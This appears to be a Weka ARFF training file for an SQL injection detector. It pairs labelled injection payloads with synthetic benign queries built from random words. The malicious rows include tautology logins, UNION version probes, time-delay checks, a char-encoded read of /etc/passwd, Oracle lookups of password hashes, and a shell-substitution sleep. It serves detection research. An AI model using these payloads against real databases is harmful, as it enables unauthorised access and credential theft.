@relation M-weka.filters.unsupervised.attribute.NominalToString-C1-weka.filters.unsupervised.attribute.NumericToNominal-R2

@attribute Query string
@attribute Label {0,1}

@data
'\"\"\" or pg_sleep  (  __TIME__  )  --\"',1
'create user name identified by pass123 temporary tablespace temp default tablespace users;',1
'\" AND 1  =  utl_inaddr.get_host_address   (    (   SELECT DISTINCT  (  table_name  )   FROM   (  SELECT DISTINCT  (  table_name  )  , ROWNUM AS LIMIT FROM sys.all_tables  )   WHERE LIMIT  =  5   )    )    AND \"i\"  =  \"i\"',1
'\" select * from users where id  =  \"1\" or @ @1  =  1 union select 1,version  (    )   -- 1\"\"',1
'\" select * from users where id  =  1 or 1#\"\"  (   union select 1,version  (    )   -- 1\"',1
' select name from syscolumns where id   =     (  select id from sysobjects where name   =   tablename\"  )  --',1
'select * from users where id  =  1 +$+ or 1  =  1 -- 1',1
'\"1;  (  load_file  (  char  (  47,101,116,99,47,112,97,115,115,119,100   )    )     )  ,1,1,1;\"',1
'\" select * from users where id  =  \"1\" or ||/1  =  1 union select 1,version  (    )   -- 1\"\"',1
'\" select * from users where id  =  \"1\" or .< union select 1,@@VERSION -- 1\"\"',1
'? or 1  =  1 --',1
' \")   or   (  \"a\"  =  \"a\"',1
'admin\" or 1  =  1#',1
'\" select * from users where id  =  1 or \"\"  (  ]\"\" or 1  =  1 -- 1\"',1
'or 1  =  1 --',1
'\" AND 1  =  utl_inaddr.get_host_address   (    (   SELECT DISTINCT  (  column_name  )   FROM   (  SELECT DISTINCT  (  column_name  )  , ROWNUM AS LIMIT FROM all_tab_columns  )   WHERE LIMIT  =  5   )    )    AND \"i\"  =  \"i\"',1
'\" select * from users where id  =  \"1\" \%!<@ union select 1,version  (    )   -- 1\"\"',1
'\" select * from users where id  =  1 or \"\"&  (  \"\" or 1  =  1 -- 1\"',1
'\" select * from users where id  =  1 or \"\"?  (  \"\" or 1  =  1 -- 1\"',1
distinct,1
'select * from users where id  =  \"1\" *  (    )   or 1  =  1 -- 1\"',1
'\"1 and ascii  (  lower  (  substring   (    (   select top 1 name from sysobjects where xtype  =  \"u\"  )  , 1, 1   )    )     )   > 116\"',1
'select * from users where id  =  1 or .< or 1  =  1 -- 1',1
'\"admin\"\" or \"\"1\"\"  =  \"\"1\"\"--\"',1
'\" select * from users where id  =  1 or \"\"\%{\"\" or 1  =  1 -- 1\"',1
insert,1
'\" select * from users where id  =  1 or 1#\"\"?  =  1 or 1  =  1 -- 1\"',1
'\" select * from users where id  =  1 or \"\"\%?\"\" or 1  =  1 -- 1\"',1
'\" AND 1  =  utl_inaddr.get_host_address   (    (   SELECT DISTINCT  (  PASSWORD  )   FROM   (  SELECT DISTINCT  (  PASSWORD  )  , ROWNUM AS LIMIT FROM SYS.USER$  )   WHERE LIMIT  =  8   )    )    AND \"i\"  =  \"i\"',1
'\" select * from users where id  =  1 or \"\"?#\"\" or 1  =  1 -- 1\"',1
'\"or 1  =  1 or \"\"\"\"  =  \"',1
'/**/or/**/1/**/  =  /**/1',1
'\" select * from users where id  =  1 or \"\".  (  \"\" or 1  =  1 -- 1\"',1
'\" select * from users where id  =  \"1\" union select ||/1,version  (    )   -- 1\"\"',1
'\" select * from users where id  =  \"1\" union select +.,@@VERSION -- 1\"\"',1
'or 1  =  1/*',1
'\%27 or 1  =  1',1
'\" select * from users where id  =  1 <@&@ union select 1,version  (    )   -- 1\"',1
'\" select * from users where id  =  \"1\" union select $*$,@@VERSION -- 1\"\"',1
'\"1;  (  load_file  (  char  (  47,101,116,99,47,112,97,115, ...\"',1
'\" select * from users where id  =  \"1\" or $ 1  =  1 union select 1,@@VERSION -- 1\"\"',1
'select * from users where id  =  1 or .<1 or 1  =  1 -- 1',1
'\" select * from users where id  =  \"1\" or < union select 1,@@VERSION -- 1\"\"',1
'\" select * from users where id  =  1 union select 1||1,version  (    )   -- 1\"',1
'\" select * from users where id  =  1 ||1 union select null,banner from v$version where rownum  =  1 -- 1\"',1
'select * from users where id  =  \"1\" or .< or 1  =  1 -- 1\"',1
'\" select * from users where id  =  1 or \"\"]{\"\" or 1  =  1 -- 1\"',1
'\" select * from users where id  =  1 or \"\".@\"\" or 1  =  1 -- 1\"',1
'\" select * from users where id  =  1 or \"\"$[\"\" or 1  =  1 -- 1\"',1
'or 1 --\"',1
'\" select * from users where id  =  1 or \"\",;\"\" or 1  =  1 -- 1\"',1
'\"admin\"\" or 1  =  1#\"',1
'\" select * from users where id  =  1 +  (  1  )   union select null,banner from v$version where rownum  =  1 -- 1\"',1
'x27UNION SELECT',1
PRINT,1
'\" select * from users where id  =  \"1\" union select   (  .  )  ,@@VERSION -- 1\"\"',1
'or 1  =  1--',1
'1 or pg_sleep  (  __TIME__  )  --',1
'\" select * from users where id  =  1 or \"\",#\"\" or 1  =  1 -- 1\"',1
'admin\"  )   or   (  \"1\"  =  \"1\"/*',1
'or 2 between 1 and 3',1
'\" select * from users where id  =  1 or \"\"  )  .\"\"  =  1 or 1  =  1 -- 1\"',1
'\" select * from users where id  =  1 or 1#\"\". union select null,version  (    )   -- 1\"',1
'admin\" or \"1\"  =  \"1',1
'; if not  (  select system_user  )   <> \"sa\" waitfor delay \"0:0:2\" --',1
'\" select * from users where id  =  1 union select 1,banner from v$version where rownum  =  1 -- 1\"',1
'\"\"\" or 0  =  0 --\"',1
'\" select * from users where id  =  1 union select @ $_,version  (    )   -- 1\"',1
'select * from users where id  =  1 <@.$ or 1  =  1 -- 1',1
'\" select * from users where id  =  1 or \"\"\%.\"\" or 1  =  1 -- 1\"',1
'\" select * from users where id  =  1 + $+*$ union select null,@@VERSION -- 1\"',1
'\" select * from users where id  =  1 or \"\",.\"\" or 1  =  1 -- 1\"',1
'char\%4039\%41\%2b\%40SELECT',1
'\" select * from users where id  =  1 or \"\"1&\"\" or 1  =  1 -- 1\"',1
'admin\"  )   or   (  \"1\"  =  \"1',1
'declare @s varchar   (  200  )   select @s   =   0x73656c6 ...',1
'\"or 0  =  0 #\"\"\"',1
'\" select * from users where id  =  1 or \"\".]\"\" or 1  =  1 -- 1\"',1
'  )   or   (  \"x\"  =  \"x',1
'\" select * from users where id  =  1.<@$ union select 1,version  (    )   -- 1\"',1
'$  (  sleep 50  ) ',1
'\" select * from users where id  =  1 *1 union select null,banner from v$version where rownum  =  1 -- 1\"',1
'\"1 union all select 1,2,3,4,5,6,name from sysobjects where xtype   =   \"u\" --\"',1
'\" select * from users where id  =  1 or 1#\"\". union select \"a\",version  (    )   -- 1\"',1
'\" select * from users where id  =  1 or 1#\"\"; union select null,version  (    )   -- 1\"',1
'\" select * from users where id  =  1 or 1#\"\"? or 1  =  1 -- 1\"',1
'\"\"\"a\"\"\"\" or 1  =  1--\"\"\"',1
'\"  SELECT Orders.againrID, Employees.might, Employees.religious FROM OrdersRIGHT JOIN Employees ON Orders.EmployeeID  =  Employees.fightID ORDER BY Orders.structureID\"',0
'SELECT number ( s )  FROM here FULL OUTER JOIN',0
'\" SELECT column_name ( s )  FROM natural,brother\"',0
'SELECT below ( s )  FROM dear UNION',0
'SELECT fresh ( s )  FROM growth SELECT electric ( s ) ',0
'SELECT wash ( s )  FROM aloud UNION ALL',0
'SELECT swim ( s )  FROM heart SELECT what FROM past',0
'SELECT season FROM book UNION SELECT out FROM pattern ORDER BY naturally',0
'SELECT television FROM previous UNION ALL SELECT fifteen FROM jar ORDER BY equal',0
'\"  SELECT perhaps,point FROM syllable WHERE sleep = \"dog\" UNION SELECT anywhere, you FROM grandfather\"',0
'\"   SELECT COUNT ( drove ) , divide FROM soap BY box\"',0
'\"   SELECT Employees.individual, COUNT ( Orders.sourceID )  AS lionFROM    ( OrdersINNER JOIN coal ON Orders.giantID  =  Employees.chiefID ) \"',0
'SELECT * FROM job FETCH FIRST 50 PERCENT ROWS ONLY',0
'SELECT education',0
'SELECT * FROM wave',0
'SELECT cloth FROM kept',0
'SELECT DISTINCT ability FROM it',0
'SELECT COUNT ( DISTINCT cattle )  FROM coach',0
'SELECT Count ( * )  AS official',0
'FROM  ( SELECT DISTINCT memory FROM track ) ',0
'SELECT * FROM nearly',0
'SELECT * FROM better WHERE gave = \"slipped\"',0
'SELECT * FROM important WHERE habit = \"parent\"',0
'SELECT * FROM garden  WHERE tide = writing',0
'SELECT * FROM stuck WHERE related = \"serious\"  AND City = \"former\"',0
'SELECT * FROM develop WHERE force = \"sink\"  OR magnet = \"hole\"',0
'SELECT * FROM highway WHERE lucky = \"felt\"  OR necessary = \"classroom\"',0
'SELECT * FROM short WHERE    NOT want = \"twelve\"',0
'SELECT * FROM salt WHERE report = \"occur\"  AND  ( could = \"teeth\" OR equal = \"choice\" ) ',0
'SELECT * FROM length WHERE NOT pen = \"none\"  AND NOT case = \"powerful\"',0
'SELECT * FROM difficult ORDER BY neighbor',0
'SELECT * FROM skill ORDER BY product DESC',0
'\" SELECT * FROM eat ORDER BY copper, dot\"',0
'\" SELECT * FROM being ORDER BY said ASC, coal DESC\"',0
'\"INSERT INTO large ( paid, ride, clothes, success, minute, porch )  VALUES  ( \"word\", \"had\". nose\", \"cold\", \"way\", \"pencil\", \"coat\" )  \"',0
'\"INSERT INTO six  ( solid, automobile, wore )  VALUES  ( \"hope\", \"leather\", \"smallest\" )  \"',0
'\"   SELECT bad, us, flame FROM putting WHERE string  IS NULL\"',0
'\"   SELECT balance, order, roadFROM hospital WHERE muscle  IS NOT NULL\"',0
'\"  UPDATE shorter SET am =  \"forgot\", City =  \"mysterious\" WHERE height =  away\"',0
' UPDATE now SET kind = \"avoid\"WHERE lot = \"his\"',0
'DELETE FROM shallow WHERE develop = \"listen\"',0
'DELETE FROM how',0
'SELECT face ( s )  FROM hurried',0
'SELECT * FROM  ( SELECT troops FROM farm ) ',0
'SELECT TOP 3 * FROM round',0
'SELECT * FROM traffic 3',0
'SELECT * FROM solid FETCH FIRST 3 ROWS ONLY',0
'SELECT TOP 50 PERCENT * FROM remember',0
'SELECT TOP 3 * FROM wire WHERE theory = \"become\"',0
'SELECT * FROM keep WHERE wheel = \"sharp\" LIMIT 3',0
'SELECT * FROM prepare WHERE two = \"paper\" FETCH FIRST 3 ROWS ONLY',0
'SELECT MIN ( stiff )  AS salt FROM plane',0
'SELECT MIN ( low )  AS plate FROM teeth',0
'SELECT * FROM  ( SELECT far FROM handle ) ',0
'SELECT TOP 3 * FROM curious SELECT * FROM halfway 3SELECT * FROM telephone',0
'SELECT * FROM heart 3 SELECT * FROM college',0
'SELECT * FROM gate FETCH FIRST 3 ROWS ONLY SELECT TOP 50 PERCENT * FROM direct',0
'SELECT TOP 50 PERCENT * FROM area SELECT * FROM wise FETCH FIRST 50 PERCENT ROWS ONLYSELECT TOP 3 * FROM throat',0
'SELECT * FROM attention FETCH FIRST 50 PERCENT ROWS ONLYSELECT TOP 3 * FROM hay',0
'SELECT TOP 3 * FROM serve WHERE instant = \"slow\" SELECT * FROM applied',0
'SELECT * FROM sharp WHERE cool = \"start\" LIMIT 3',0
'SELECT * FROM arm WHERE canal = \"wagon\" FETCH FIRST 3 ROWS ONLY',0
'SELECT AVG ( similar ) FROM cutting',0
'SELECT * FROM early WHERE kept NOT LIKE \"[satellites]\%\"',0
'SELECT AVG ( half ) FROM balance SELECT SUM ( break ) ',0
'SELECT AVG ( task ) FROM medicine SELECT SUM ( shut ) ',0
'SELECT AVG ( police )  FROM sang  SELECT SUM ( known ) ',0
'SELECT COUNT ( pick ) FROM guard',0
'SELECT COUNT ( forest ) FROM visit',0
'SELECT AVG ( fresh ) FROM child',0
'SELECT * FROM tears WHERE difference NOT LIKE \"track\%\"',0
'SELECT * FROM walk WHERE sudden LIKE \"\%serious\%\"',0
'SELECT * FROM club  WHERE planning NOT LIKE \"[pocket]\%\"',0
'\"  SELECT * FROM table WHERE obtain IN  ( \"became\", \"vowel\", \"completely\" )  \"',0
'\"  SELECT * FROM across WHERE desk NOT IN  ( \"window\", \"laid\", \"eat\" )  \"',0
'SELECT * FROM whatever WHERE writer IN  ( SELECT noise FROM damage ) ',0
'SELECT * FROM greatly WHERE tropical  BETWEEN 10 AND 20',0
'SELECT * FROM gate WHERE Price NOT BETWEEN 10 AND 20',0
'SELECT * FROM amount WHERE part BETWEEN \"grandmother\" AND \"card\"',0
'\"SELECT * FROM laugh WHERE themselves BETWEEN \"\"herself\"\" AND    \"\"operation\"\"\"',0
'SELECT * FROM chapter WHERE wrapped NOT BETWEEN \"completely\" AND \"single\"',0
'SELECT * FROM serve WHERE tea BETWEEN move09/01/1996flies AND deer15/31/1996zoo',0
'SELECT * FROM add WHERE wealth BETWEEN \"1996-07-01\" AND \"1996-07-31\"',0
'SELECT AVG ( for ) FROM putting SELECT SUM ( season ) ',0
'SELECT COUNT ( sweet )  FROM thumb',0
'SELECT COUNT ( eightID ) FROM sick',0
'SELECT AVG ( Price ) FROM noted',0
'SELECT * FROM advice WHERE question BETWEEN \"1996-07-01\" AND \"1996-07-31\"',0
'\"  SELECT chooseID AS ID, president AS grabbed FROM value\"',0
'\"  SELECT byID AS ID, alphabet AS cover FROM jet\"',0
'\"  SELECT scale AS explore, three AS [slipped]  FROM chose\"',0
'\"   SELECT customs, they+ \", \" + go+ \" \" + diameter+ \", \" + horse AS ride  FROM growth\"',0
'SELECT hurried ( s ) FROM saw INNER JOIN',0
'\"   SELECT pack,ourselves,dirty,church,basket     (  (  nice JOIN couple ON fur.made =  blood.still )   INNER JOIN answerON Orders.slipped =  nine.fearID ) \"',0
'SELECT fort ( s )  FROM main LEFT JOIN',0
'\"  SELECT ring,amount,interior FROM sleep LEFT JOIN Orders ON size.caughtID =  sharp.damage ORDER BY damage.shape\"',0
'SELECT prepare ( s FROM shade RIGHT JOIN',0
'\"  SELECT Orders.fullrID, Employees.angle, Employees.crack FROM OrdersRIGHT JOIN Employees ON Orders.EmployeeID  =  Employees.uncleID ORDER BY Orders.cookID\"',0
'SELECT relationship ( s )  FROM production FULL OUTER JOIN',0
'\" SELECT column_name ( s )  FROM fox,done\"',0
'SELECT clearly ( s )  FROM somebody UNION',0
'SELECT graph ( s )  FROM many SELECT properly ( s ) ',0
'SELECT shinning ( s )  FROM upward UNION ALL',0
'SELECT new ( s )  FROM bark SELECT what FROM service',0
'SELECT flow FROM beneath UNION SELECT composition FROM shelf ORDER BY clearly',0
'SELECT active FROM bottle UNION ALL SELECT hit FROM twice ORDER BY it',0
'\"  SELECT hot,valley FROM voyage WHERE north = \"smallest\" UNION SELECT direct, hurried FROM rough\"',0
'\"   SELECT COUNT ( them ) , solid FROM card BY author\"',0
'\"   SELECT Employees.vowel, COUNT ( Orders.batID )  AS engineFROM    ( OrdersINNER JOIN beauty ON Orders.tillID  =  Employees.pitchID ) \"',0
'SELECT * FROM speed FETCH FIRST 50 PERCENT ROWS ONLY',0
'SELECT second',0
'SELECT * FROM other',0
'SELECT melted FROM strange',0
'SELECT DISTINCT year FROM ground',0
'SELECT COUNT ( DISTINCT appropriate )  FROM completely',0
'SELECT Count ( * )  AS army',0
'FROM  ( SELECT DISTINCT strange FROM area ) ',0
'SELECT * FROM friend',0
'SELECT * FROM load WHERE very = \"secret\"',0
'SELECT * FROM die WHERE ball = \"edge\"',0
'SELECT * FROM variety  WHERE law = cross',0
'SELECT * FROM pen WHERE complex = \"satisfied\"  AND City = \"soldier\"',0
'SELECT * FROM burst WHERE voyage = \"period\"  OR sign = \"poetry\"',0
'SELECT * FROM call WHERE behind = \"gulf\"  OR refer = \"hot\"',0
'SELECT * FROM thin WHERE    NOT object = \"reason\"',0
'SELECT * FROM tonight WHERE potatoes = \"ride\"  AND  ( shadow = \"play\" OR cage = \"toward\" ) ',0
'SELECT * FROM weather WHERE NOT stay = \"just\"  AND NOT concerned = \"respect\"',0
'SELECT * FROM invented ORDER BY finger',0
'SELECT * FROM base ORDER BY symbol DESC',0
'\" SELECT * FROM combination ORDER BY dark, pile\"',0
'\" SELECT * FROM everywhere ORDER BY imagine ASC, nodded DESC\"',0
'\"INSERT INTO youth ( give, freedom, chosen, heavy, buried, how )  VALUES  ( \"blanket\", \"satisfied\". whatever\", \"half\", \"yellow\", \"exciting\", \"signal\" )  \"',0
'\"INSERT INTO watch  ( help, gas, excellent )  VALUES  ( \"among\", \"than\", \"skill\" )  \"',0
'\"   SELECT mouth, swimming, herself FROM dangerous WHERE leaving  IS NULL\"',0
'\"   SELECT bat, inch, biggerFROM opinion WHERE show  IS NOT NULL\"',0
'\"  UPDATE to SET born =  \"lion\", City =  \"belt\" WHERE range =  rising\"',0
'UPDATE wave SET load = \"speak\"WHERE carry = \"probably\"',0
'SELECT * FROM exchange',0
'DELETE FROM hill WHERE aboard = \"opposite\"',0
'DELETE FROM swept',0
'SELECT grabbed ( s )  FROM moon',0
'SELECT * FROM  ( SELECT life FROM probably ) ',0
'SELECT TOP 3 * FROM believed',0
'SELECT * FROM honor 3',0
'SELECT TOP 50 PERCENT * FROM piano',0
'SELECT * FROM substance FETCH FIRST 50 PERCENT ROWS ONLY',0
'SELECT TOP 3 * FROM announced WHERE cream = \"school\"',0
'SELECT * FROM problem WHERE movie = \"add\" LIMIT 3',0
'SELECT * FROM move WHERE religious = \"lost\" FETCH FIRST 3 ROWS ONLY',0
'SELECT MIN ( highest )  AS spread FROM require',0
'SELECT MIN ( parent )  AS doctor FROM therefore',0
'SELECT * FROM  ( SELECT production FROM golden ) ',0
'SELECT TOP 3 * FROM warn SELECT * FROM frozen 3SELECT * FROM unknown',0
'SELECT * FROM friend 3 SELECT * FROM percent',0
'SELECT * FROM zero FETCH FIRST 3 ROWS ONLY SELECT TOP 50 PERCENT * FROM mirror',0
'SELECT TOP 50 PERCENT * FROM wet SELECT * FROM inch FETCH FIRST 50 PERCENT ROWS ONLYSELECT TOP 3 * FROM wild',0
'SELECT * FROM closely FETCH FIRST 50 PERCENT ROWS ONLYSELECT TOP 3 * FROM sum',0
'SELECT TOP 3 * FROM just WHERE doll = \"adventure\" SELECT * FROM try',0
'SELECT * FROM headed WHERE too = \"active\" LIMIT 3',0
'SELECT * FROM stone WHERE mile = \"pound\" FETCH FIRST 3 ROWS ONLY',0
'SELECT AVG ( movie ) FROM modern',0
'SELECT * FROM largest WHERE union NOT LIKE \"[function]\%\"',0
'SELECT AVG ( mountain ) FROM science SELECT SUM ( visit ) ',0
'SELECT AVG ( into ) FROM stepped SELECT SUM ( worry ) ',0
'SELECT AVG ( desk )  FROM explore  SELECT SUM ( make ) ',0
'SELECT COUNT ( jack ) FROM failed',0
'SELECT COUNT ( modern ) FROM double',0
'SELECT AVG ( yet ) FROM wrong',0
'SELECT * FROM fall WHERE doctor NOT LIKE \"arrow\%\"',0
'SELECT * FROM passage WHERE trouble LIKE \"\%pen\%\"',0
'SELECT * FROM fruit  WHERE toy NOT LIKE \"[bend]\%\"',0
'\"  SELECT * FROM both WHERE using IN  ( \"wheel\", \"society\", \"instance\" )  \"',0
'\"  SELECT * FROM gulf WHERE pen NOT IN  ( \"enough\", \"do\", \"women\" )  \"',0
'SELECT * FROM car WHERE won IN  ( SELECT silver FROM general ) ',0
'SELECT * FROM told WHERE needed  BETWEEN 10 AND 20',0
'SELECT * FROM buffalo WHERE Price NOT BETWEEN 10 AND 20',0
'SELECT * FROM metal WHERE trouble BETWEEN \"constantly\" AND \"alike\"',0
'\"SELECT * FROM call WHERE fix BETWEEN \"\"whether\"\" AND    \"\"locate\"\"\"',0
'SELECT * FROM take WHERE country NOT BETWEEN \"deer\" AND \"military\"',0
'SELECT * FROM mostly WHERE sky BETWEEN headed09/01/1996west AND lie15/31/1996given',0
'SELECT * FROM press WHERE heat BETWEEN \"1996-07-01\" AND \"1996-07-31\"',0
'SELECT AVG ( test ) FROM look SELECT SUM ( free ) ',0
'SELECT COUNT ( spoken )  FROM explanation',0
'SELECT COUNT ( dependID ) FROM relationship',0
'SELECT AVG ( Price ) FROM consist',0
'SELECT * FROM cave WHERE card BETWEEN \"1996-07-01\" AND \"1996-07-31\"',0
'\"  SELECT hiddenID AS ID, aid AS fell FROM bet\"',0
'\"  SELECT waitID AS ID, where AS apartment FROM closely\"',0
'\"  SELECT long AS point, birth AS [clean]  FROM child\"',0
'\"   SELECT wave, reason+ \", \" + produce+ \" \" + class+ \", \" + or AS behavior  FROM dawn\"',0
'SELECT dirty ( s ) FROM matter INNER JOIN',0
'\"   SELECT grabbed,ten,clay,almost,one     (  (  cake JOIN cattle ON steep.worried =  not.seeing )   INNER JOIN stormON Orders.did =  film.wrappedID ) \"',0
'SELECT test ( s )  FROM means LEFT JOIN',0
'\"  SELECT belong,alone,anybody FROM same LEFT JOIN Orders ON successful.progressID =  return.weak ORDER BY tales.college\"',0
'SELECT slip ( s FROM ago RIGHT JOIN',0
'\"  SELECT Orders.shadowrID, Employees.becoming, Employees.please FROM OrdersRIGHT JOIN Employees ON Orders.EmployeeID  =  Employees.seeID ORDER BY Orders.nestID\"',0
'SELECT bow ( s )  FROM expect FULL OUTER JOIN',0
'\" SELECT column_name ( s )  FROM zipper,hot\"',0
'SELECT vast ( s )  FROM queen UNION',0
'SELECT clearly ( s )  FROM massage SELECT double ( s ) ',0
'SELECT smallest ( s )  FROM key UNION ALL',0
'SELECT bow ( s )  FROM chief SELECT right FROM word',0
'SELECT is FROM pleasant UNION SELECT careful FROM month ORDER BY rocky',0
'SELECT up FROM recently UNION ALL SELECT thank FROM tip ORDER BY pack',0
'\"  SELECT corner,grandfather FROM whispered WHERE behavior = \"income\" UNION SELECT slowly, frog FROM greatly\"',0
'\"   SELECT COUNT ( nearest ) , conversation FROM jack BY he\"',0
'\"   SELECT Employees.final, COUNT ( Orders.earlyID )  AS carFROM    ( OrdersINNER JOIN which ON Orders.supportID  =  Employees.soilID ) \"',0
'SELECT several',0
'SELECT * FROM announced',0
'SELECT easily FROM even',0
'SELECT DISTINCT cattle FROM near',0
'SELECT COUNT ( DISTINCT community )  FROM highway',0
'SELECT Count ( * )  AS properly',0
'FROM  ( SELECT DISTINCT way FROM area ) ',0
'SELECT * FROM probably',0
'SELECT * FROM realize WHERE necessary = \"not\"',0
'SELECT * FROM brain WHERE gasoline = \"who\"',0
'SELECT * FROM eleven  WHERE tried = labor',0
'SELECT * FROM flight WHERE aid = \"nervous\"  AND City = \"solution\"',0
'SELECT * FROM language WHERE yourself = \"goose\"  OR smoke = \"being\"',0
'SELECT * FROM claws WHERE mountain = \"steam\"  OR pie = \"mistake\"',0
'SELECT * FROM thread WHERE    NOT eleven = \"worse\"',0
'SELECT * FROM held WHERE continued = \"balloon\"  AND  ( imagine = \"many\" OR furniture = \"badly\" ) ',0
'SELECT * FROM clothes WHERE NOT dear = \"deal\"  AND NOT adventure = \"table\"',0
'SELECT * FROM main ORDER BY nearby',0
'SELECT * FROM throat ORDER BY cake DESC',0
'\" SELECT * FROM balloon ORDER BY climate, mostly\"',0
'\" SELECT * FROM write ORDER BY nation ASC, simply DESC\"',0
'\"INSERT INTO chair ( answer, action, pictured, disease, end, screen )  VALUES  ( \"scene\", \"idea\". likely\", \"made\", \"donkey\", \"land\", \"atomic\" )  \"',0
'\"INSERT INTO boy  ( goose, offer, slabs )  VALUES  ( \"particularly\", \"course\", \"exact\" )  \"',0
'\"   SELECT tomorrow, speak, plastic FROM particular WHERE upper  IS NULL\"',0
'\"   SELECT question, barn, lieFROM current WHERE burst  IS NOT NULL\"',0
'\"  UPDATE won SET known =  \"prepare\", City =  \"far\" WHERE dust =  terrible\"',0
'UPDATE motor SET traffic = \"tobacco\"WHERE east = \"species\"',0
'SELECT * FROM rest',0
'DELETE FROM door WHERE grow = \"small\"',0
'DELETE FROM tomorrow',0
'SELECT wide ( s )  FROM west',0
'SELECT * FROM  ( SELECT slide FROM breath ) ',0
'SELECT TOP 3 * FROM race',0